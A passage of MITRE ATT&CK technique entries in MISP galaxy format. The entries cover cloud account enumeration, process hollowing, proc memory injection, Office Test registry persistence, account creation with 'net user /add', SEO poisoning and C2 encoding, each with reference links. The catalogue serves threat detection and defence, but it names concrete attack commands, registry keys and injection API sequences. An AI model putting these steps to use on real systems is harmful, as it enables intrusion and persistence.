The AWS command <code>aws iam list-users</code> may be used to obtain a list of users in the current account while <code>aws iam list-roles</code> can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects get-iam-policy</code> may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004"

Table 6044. Table References

Links

https://attack.mitre.org/techniques/T1087/004

https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list

https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html

https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html

https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest

https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0

https://github.com/True-Demon/raindance

https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/

IP Addresses - T1590.005

Adversaries may gather the victim’s IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="IP Addresses - T1590.005"

Table 6045. Table References

Links

https://attack.mitre.org/techniques/T1590/005

https://dnsdumpster.com/

https://www.circl.lu/services/passive-dns/

https://www.whois.net/

Visual Basic - T1059.005

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )

The tag is: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005"

Table 6046. Table References

Links

https://attack.mitre.org/techniques/T1059/005

https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/

https://docs.microsoft.com/dotnet/visual-basic/

https://docs.microsoft.com/office/vba/api/overview/

https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)

https://en.wikipedia.org/wiki/Visual_Basic_for_Applications

https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805

Proc Memory - T1055.009

Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.

Proc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man)

Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Proc Memory - T1055.009"

Table 6047. Table References

Links

http://hick.org/code/skape/papers/needle.txt

http://man7.org/linux/man-pages/man1/dd.1.html

https://attack.mitre.org/techniques/T1055/009

https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed. Adversaries may also use free or paid accounts on Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Link Target - T1608.005"

Table 6048. Table References

Links

https://attack.mitre.org/techniques/T1608/005

https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/

https://blog.talosintelligence.com/ipfs-abuse/

https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/

https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service

https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian

Device Registration - T1098.005

Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.

MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account’s first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)

Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537)

Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)

The tag is: misp-galaxy:mitre-attack-pattern="Device Registration - T1098.005"

Table 6049. Table References

Links

https://attack.mitre.org/techniques/T1098/005

https://o365blog.com/post/bprt/

https://o365blog.com/post/devices/

https://o365blog.com/post/mdm

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack

https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft

https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

Cloud API - T1059.009

Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006).

Cloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.

With proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud API - T1059.009"

Table 6050. Table References

Links

https://attack.mitre.org/techniques/T1059/009

https://github.com/Azure/azure-powershell

SEO Poisoning - T1608.006

Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)

To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)

Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)

SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)

The tag is: misp-galaxy:mitre-attack-pattern="SEO Poisoning - T1608.006"

Table 6051. Table References

Links

https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/

https://attack.mitre.org/techniques/T1608/006

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://www.malwarebytes.com/blog/news/2018/05/seo-poisoning-is-it-worth-it

https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0

Standard Encoding - T1132.001

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001"

Table 6052. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1132/001

https://en.wikipedia.org/wiki/Binary-to-text_encoding

https://en.wikipedia.org/wiki/Character_encoding

Symmetric Cryptography - T1521.001

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, Blowfish, and RC4.

The tag is: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1521.001"

Table 6053. Table References

Links

https://attack.mitre.org/techniques/T1521/001

Fileless Storage - T1027.011

Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)

Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.

Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.

Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., %SystemRoot%\System32\Wbem\Repository) or Registry (e.g., %SystemRoot%\System32\Config) physical files.(Citation: Microsoft Fileless)

The tag is: misp-galaxy:mitre-attack-pattern="Fileless Storage - T1027.011"

Table 6054. Table References

Links

https://attack.mitre.org/techniques/T1027/011

https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats

https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/

Local Account - T1136.001

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, or to Kubernetes clusters using the kubectl utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001"

Table 6055. Table References

Links

https://attack.mitre.org/techniques/T1136/001

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

https://kubernetes.io/docs/concepts/security/service-accounts/

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630

Internal Defacement - T1491.001

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary’s presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001"

Table 6056. Table References

Links

https://attack.mitre.org/techniques/T1491/001

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

Asymmetric Cryptography - T1521.002

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1521/002).

The tag is: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1521.002"

Table 6057. Table References

Links

https://attack.mitre.org/techniques/T1521/002

Control Panel - T1218.002

Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)

Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through its <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.(Citation: ESET InvisiMole June 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002"

Table 6058. Table References

Links

https://attack.mitre.org/techniques/T1218/002

https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/

https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Code Repositories - T1213.003

Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software’s source code. Having access to software’s source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)

Note: This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.

The tag is: misp-galaxy:mitre-attack-pattern="Code Repositories - T1213.003"

Table 6059. Table References

Links

https://attack.mitre.org/techniques/T1213/003

https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/

https://www.wired.com/story/uber-paid-off-hackers-to-hide-a-57-million-user-data-breach/

Domain Account - T1136.002

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002"

Table 6060. Table References

Links

https://attack.mitre.org/techniques/T1136/002

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Unix Shell - T1623.001

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.

The tag is: misp-galaxy:mitre-attack-pattern="Unix Shell - T1623.001"

Table 6061. Table References

Links

https://attack.mitre.org/techniques/T1623/001

https://partner.samsungknox.com/mtd

Office Test - T1137.002

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)

There exist user and global Registry keys for the Office Test feature:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.

The tag is: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002"

Table 6062. Table References

Links

http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/

https://attack.mitre.org/techniques/T1137/002

https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/

System Firmware - T1542.001

Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

The tag is: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001"

Table 6063. Table References

Links

http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html

http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about

http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

http://www.uefi.org/about

https://attack.mitre.org/techniques/T1542/001

https://en.wikipedia.org/wiki/BIOS

https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface

https://github.com/chipsec/chipsec

https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/

Broadcast Receivers - T1624.001

Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities.

An intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.

In addition to Android system intents, malicious applications can register for intents broadcasted by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications.

In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)

The tag is: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1624.001"

Table 6064. Table References

Links

https://attack.mitre.org/techniques/T1624/001

https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts

Bidirectional Communication - T1481.002

Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.

Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1481.002"

Table 6065. Table References

Links

https://attack.mitre.org/techniques/T1481/002

External Defacement - T1491.002

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)

The tag is: misp-galaxy:mitre-attack-pattern="External Defacement - T1491.002"

Table 6066. Table References

Links

https://attack.mitre.org/techniques/T1491/002

https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf

https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf

https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf

Process Hollowing - T1055.012

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)

This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012"

Table 6067. Table References

Links

http://www.autosectools.com/process-hollowing.pdf

https://attack.mitre.org/techniques/T1055/012

https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode

Downgrade Attack - T1562.010

Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.

